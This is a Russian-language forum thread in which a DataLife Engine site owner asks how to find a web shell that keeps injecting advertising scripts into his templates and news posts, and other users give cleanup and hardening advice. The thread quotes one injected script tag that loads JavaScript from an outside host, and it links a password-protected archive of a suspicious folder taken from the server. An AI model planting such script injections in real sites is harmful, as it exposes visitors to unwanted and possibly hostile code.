Новая тема   Ответить

 cococks
НЕ давно увидел в main.tpl посторонний скрипт - удалил (движок ДЛЕ). Начали появляться другие скрипты рекламного характера пример:
[not-group=1] <script type="text/javascript" src="http://boosak.ru/?type=js&key=0f2ee68fd22d3f6"></script>[/not-group]

Решил поставить лицензию на дле. Купил ключ, поставил 9,8 (был 9,8 нуллед), сменил шаблон(у меня бесплатный Hot Girls называется, скачал с трастового сайт - dle9)
Кароче решил с нового листа. Не прошло и пол дня как скрипты начали сыпаться снова. Забыл сказать, что запретил доступ на ftp ко всем .tpl. А эта св*лоч теперь льет мне скрипты в новости. Должен каждый раз перезаливать базу данных, а то удалить свыше 1000 скриптов - невозможно сложно).
Че делать? где искать этот шелл?
ПС удалил сегодня с корня фтп новую папку manul. Ссылка ниже, пароль на архив 12345
https://yadi.sk/d/M_uYcwtrhm7FQ

 raider
снести DLE
непользовать nulled
nulled DLE - замеделная бомба

 cococks
А ты читал ваще что я писал? Я поставил лицензию

 Stek
cococks писал:
так может тебе фтп ломанули ?

 raider
ну видать с DLE толко начал
там щелов и руткитов mysql может быть вагон и тележка + файлы перезаливал или все сносил?
+ template делал или красил чужой?
с DLE njkrmj напали помогает
переходи на WP
все функции выполняет так же для downlaods

 PornoMich
Цитата:

вместо друшлака решето? ) занятно

 raider
почему решето? - disallow кроме твоего IP тебя спасет

 S_Flash

на весь домен!

 raider
ну конечно! - зачем в админку заходить по IP твоего VPN на VDS

 cococks
Цитата:
Все сносил с нуля. Заново заливал dle (лицензия).Шаблон был бесплатный - редактировал. Перезалил скачанный с другого сайта, проверил ai-bolitom - чистый.
Токо начались проблемы, сменил пароли, включая фтп.
Могу слить дамп сайта если кто то толковый решит взглянуть.

 raider
mysql проверь на инъекции

 Alexandur
cococks: посмотри в логах, с какого ip обращаются к админ-части, либо к шеллам.
Заново всё установи и жди следующего взлома. Посмотри что запрашивают, там и ищи.

 cococks
А как посмотреть в логах? или инъекциях?

 Alexandur
Логи обычно хранятся в /var/log/
посмотри, что там есть. Может даже они отключены.

Искать, как-то так:
Код:
Ищет строки в апачевских логах с попыткой доступа к wp-admin, его соответственно меняешь на адрес админ-секции у ДЛЕ.

Если логи сжимаются, то
Код:

Ещё, может пригодиться
Код:
Вывести список файлов php, которые были изменены более 31 дня назад.

Вроде всё, чем я ловил хакеров.

 Alexandur
Вот статья хорошая: http://habrahabr.ru/company/pentestit/blog/262579/
и оттуда скрипт http://revisium.com/ai/

 polusweb
закрыть необходимо доступ к админке (через .htaccess) по ip, в ftp по iptables (если у вас линукс). просканить на вирусы домены. это первое что надо сделать